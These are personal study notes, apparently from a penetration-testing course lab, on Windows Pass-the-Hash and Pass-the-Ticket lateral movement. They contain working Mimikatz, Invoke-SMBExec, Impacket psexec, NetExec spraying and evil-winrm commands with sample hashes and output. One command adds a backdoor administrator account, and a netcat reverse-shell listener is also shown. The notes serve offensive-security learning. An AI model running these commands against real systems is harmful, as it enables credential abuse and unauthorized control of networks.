:PROPERTIES:
:ID:       56ba978e-3626-47a8-bae5-cf6a630a3b4b
:END:
#+title: Windows Lateral Escalation Techniques
#+OPTIONS: toc:3 ^:{}

* TOC :toc_3:
- [[#pass-the-hash-pth][Pass the Hash (PtH)]]
  - [[#windows-ntlm][Windows NTLM]]
  - [[#pth-w-mimikatz-win][PtH w Mimikatz (win)]]
  - [[#pth-w-ps-invoke-thehash-windows][PtH w PS Invoke-TheHash (Windows)]]
    - [[#invoke-thehash-w-smb][Invoke-TheHash w SMB]]
    - [[#reverse-shell][Reverse shell]]
  - [[#pth-with-impacket-linux][PtH with Impacket (linux)]]
  - [[#pth-with-netexec-linux][PtH with NetExec (linux)]]
    - [[#pth-with-evil-winrm-linux][PtH with evil-winrm (linux)]]
    - [[#pth-with-rdp-linux][PtH with RDP (linux)]]
    - [[#uac-limits-pth-for-local-accounts][UAC limits PtH for local accounts]]
- [[#pass-the-ticket-from-win][Pass the Ticket (from Win)]]
  - [[#kerberos-protocol][Kerberos protocol]]
  - [[#ptt-attack][PtT Attack]]

* Pass the Hash (PtH)
+ attacker uses password hash instead of plain text passwords for authentication
+ must have admin privileges on target machine to obtain password hashes
+ can be obtained by:
  * dumping local SAM DB from compromised host
  * extracting hashes from NTDS DB on domain controller (ntds.dit)
  * pulling hashes from memory (lsass.exe)

** Windows NTLM
- New Technology LAN Manager
- set of security protocols that authenticates users' & integrity & confidentiality of their data
- single sign on solution
- uses challenge-response protocol to verify user identity w/out having them provide password
- Replaced by Kerberos as default auth mechanism in *win 2000* & subsequent AD domains
- NTLM doesn't *salt* passwords stored on server

** PtH w Mimikatz (win)
- =sekurlsa::pth= module
****** requirements:
- =/user=
- =/rc4= or =/NTLM= -> NTLM hash of user's pass
- =/domain=
- =/run= (default -> cmd.exe)
#+begin_src PS
c:\tools> mimikatz.exe privilege::debug "sekurlsa::pth /user:julio /rc4:64F12CDDAA88057E06A81B54E73B949B /domain:inlanefreight.htb /run:cmd.exe" exit

user    : julio
domain  : inlanefreight.htb
program : cmd.exe
impers. : no
NTLM    : 64F12CDDAA88057E06A81B54E73B949B
  |  PID  8404
  |  TID  4268
  |  LSA Process was already R/W
  |  LUID 0 ; 5218172 (00000000:004f9f7c)
  \_ msv1_0   - data copy @ 0000028FC91AB510 : OK !
  \_ kerberos - data copy @ 0000028FC964F288
   \_ des_cbc_md4       -> null
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ *Password replace @ 0000028FC9673AE8 (32) -> null

#+end_src

** PtH w PS Invoke-TheHash (Windows)
- collection of PS fn() to perform PtH w *WMI* & *SMB*
- WMI & SMB connections accessed through =.NET TCPClient=
- auth performed by passing NTLM hash into NTLMv2 auth protocol
- local admin priv not required client side.
- user & hash need to have admin rights on target

****** Requirements
- =Target=
- =Username=
- =Domain=
- =Hash=
- =Command=

*** Invoke-TheHash w SMB
#+begin_src PS
PS c:\htb> cd C:\tools\Invoke-TheHash\
PS c:\tools\Invoke-TheHash> Import-Module .\Invoke-TheHash.psd1
PS c:\tools\Invoke-TheHash> Invoke-SMBExec -Target 172.16.1.10 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "net user mark Password123 /add && net localgroup administrators mark /add" -Verbose

VERBOSE: [+] inlanefreight.htb\julio successfully authenticated on 172.16.1.10
VERBOSE: inlanefreight.htb\julio has Service Control Manager write privilege on 172.16.1.10
VERBOSE: Service EGDKNNLQVOLFHRQTQMAU created on 172.16.1.10
VERBOSE: [*] Trying to execute command on 172.16.1.10
[+] Command executed with service EGDKNNLQVOLFHRQTQMAU on 172.16.1.10
VERBOSE: Service EGDKNNLQVOLFHRQTQMAU deleted on 172.16.1.10
#+end_src

*** Reverse shell
- start listener
~.\nc.exe -lvnp 8001~
- [[revshells.com]]

** PtH with Impacket (linux)
**** PsExec
- can also use =wmiexec=, =atexec=, =smbexec=
#+begin_src bash
biscuitrescue@htb[/htb]$ impacket-psexec administrator@10.129.201.126 -hashes :30B3783CE2ABF1AF70F77D0660CF3453

Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 10.129.201.126.....
[*] Found writable share ADMIN$
[*] Uploading file SLUBMRXK.exe
[*] Opening SVCManager on 10.129.201.126.....
[*] Creating service AdzX on 10.129.201.126.....
[*] Starting service AdzX.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.19044.1415]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>
#+end_src

** PtH with NetExec (linux)
- useful for *spraying*
- ~netexec smb 172.16.1.0/24 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453~
- to auth each host in subnet using local admin pass hash, add ~--local-auth~
- ~-x~ to exec commands
- ~netexec smb 10.129.201.126 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453 -x whoami~

*** PtH with evil-winrm (linux)
- ~evil-winrm -i 10.129.201.126 -u <user> -H <hash>~

*** PtH with RDP (linux)
- =Restricted Admin Mode= must be activated on target (*disabled by default*)
  - done by adding *registry key* =DisableRestrictedAdmin= under ~HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa~ with val of 0
  - ~c:\tools> reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f~
- ~xfreerdp  /v:10.129.201.126 /u:julio /pth:64F12CDDAA88057E06A81B54E73B949B~

*** UAC limits PtH for local accounts
- UAC limits local users' ability to perform remote admin operations
- when =HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy= is *0* -> built-in local admin (RID-500, "Administrator") is only local account allowed to perform remote admin tasks.
  - setting to *1* lets other local admins also.

* Pass the Ticket (from Win)
- method to move laterally in AD env
- use stolen kerberos ticket to move

** Kerberos protocol
- [[*Kerberos][Kerberos]]
- auth system -> ticket based
- kerberos keeps all tickets on local system & presents each service only specific ticket for that service
***** TGT & TGS
- =Ticket Granting Ticket= -> *first* ticket obtained on kerberos system
  * permits client to obtain additional kerberos tickets or =TGS=
- =Ticket Granting Service= -> requested by users who want to use service
  * allows services to verify user's ID
        
***** Steps
1. user requests =TGT=, must auth to domain controller by encrypting current timestamp w passw hash
2. when domain controller validates user's ID, sends TGT for future requests.

***** For MSSQL
- if user wants to connect to MSSQL DB, req =TGS= to =Key Distribution Center= (=KDC=), presenting =TGT=
  
** PtT Attack
- valid kerberos ticket needed:
  * =TGS=
  * =TGT=
    
